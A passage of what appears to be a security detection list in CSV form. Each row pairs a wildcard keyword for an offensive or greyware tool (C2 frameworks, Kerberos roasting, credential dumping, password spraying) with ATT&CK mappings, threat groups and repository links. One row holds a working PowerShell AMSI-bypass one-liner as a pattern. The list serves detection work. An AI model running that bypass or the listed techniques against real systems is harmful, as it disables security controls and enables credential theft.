T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifactuac*.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*aruba2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*AS 'Login that can be impersonated'*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*as 'Owner that can be impersonated'*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*ASBBypass.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*ASBBypass.ps1*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*ASBBypass.ps1*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,1,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*ASRenum-BOF.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mlcsec/ASRenum-BOF,1,1,N/A,10,10,121,15,2022-12-28T17:27:18Z,2022-12-28T14:41:02Z -*asrep_attack*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*asrep2kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*asreprc4_attack*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*asreproast /*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Asreproast.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*ASREPRoast.ps1*,offensive_tool_keyword,ASREPRoast,Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ,T1558.003,TA0006,N/A,N/A,Credential Access,https://github.com/HarmJ0y/ASREPRoast,1,1,N/A,N/A,2,180,57,2018-09-25T03:26:00Z,2017-01-14T21:07:57Z -*asreproast_*.txt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*asreproast_john_results_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*asreproast_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ASreproasting.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*ASRepToHashcat*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*Assemblies/SharpMove.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*assembly *.asm *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*assembly *.exe *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*'NonPublic*Static').SetValue($null*$true)*,offensive_tool_keyword,AD exploitation cheat sheet,PowerShell AMSI Bypass,T1548 T1562 T1027,N/A,N/A,N/A,Defense Evasion,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assembly_inject -*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*--assemblyargs AntiVirus AppLocker*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*Assets/solution/dllmain.cpp*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,1,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*AssmblyLoader*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*assoc *findstr *=cm*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string =cm - hidden objectif is to find .cdxml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr *lCmd*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string lCmd - hidden objectif is to find .cdxml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr *mdf*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string mdf - hidden objectif is to find cmdfile association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr *s1x*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string s1x - hidden objectif is to find .ps1xml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr =cm*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string =cm - hidden objectif is to find .cdxml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr lCmd*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string lCmd - hidden objectif is to find .cdxml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr mdf*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string mdf - hidden objectif is to find cmdfile association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr s1x*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string s1x - hidden objectif is to find .ps1xml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*AsStrongAsFuck.exe*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*AsStrongAsFuck.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*async_webshell-all.py*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*AsyncRAT/DCRat*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*asyncssh_commander.py *,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*asyncssh_commander.py*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*AteraAgent*AgentPackageRunCommandInteractive.exe*,greyware_tool_keyword,Atera,control remote machines- abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*atexec.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Athena.Forwarders.SMB*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*athena/agent_code/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*AthenaPlugins.csproj*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*AtlasC2*APIModels*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2*Client*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2*implant*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2*TeamServer*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2.exe*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2b.exe*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2b.sln*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasImplant.yar*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasReaper.exe*,offensive_tool_keyword,AtlasReaper,A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.,T1210.002 - T1078.003 - T1046 ,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://github.com/werdhaihai/AtlasReaper,1,1,N/A,3,3,202,21,2023-09-14T23:50:33Z,2023-06-24T00:18:41Z -*AtlasReaper-main*,offensive_tool_keyword,AtlasReaper,A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.,T1210.002 - T1078.003 - T1046 ,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://github.com/werdhaihai/AtlasReaper,1,1,N/A,3,3,202,21,2023-09-14T23:50:33Z,2023-06-24T00:18:41Z -*atmail2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*atomizer imap *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer lync *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer owa *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer.py -*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer.py imap *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer.py lync *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer.py owa *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*AtomLdr.dll*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*AtomLdr.sln*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z 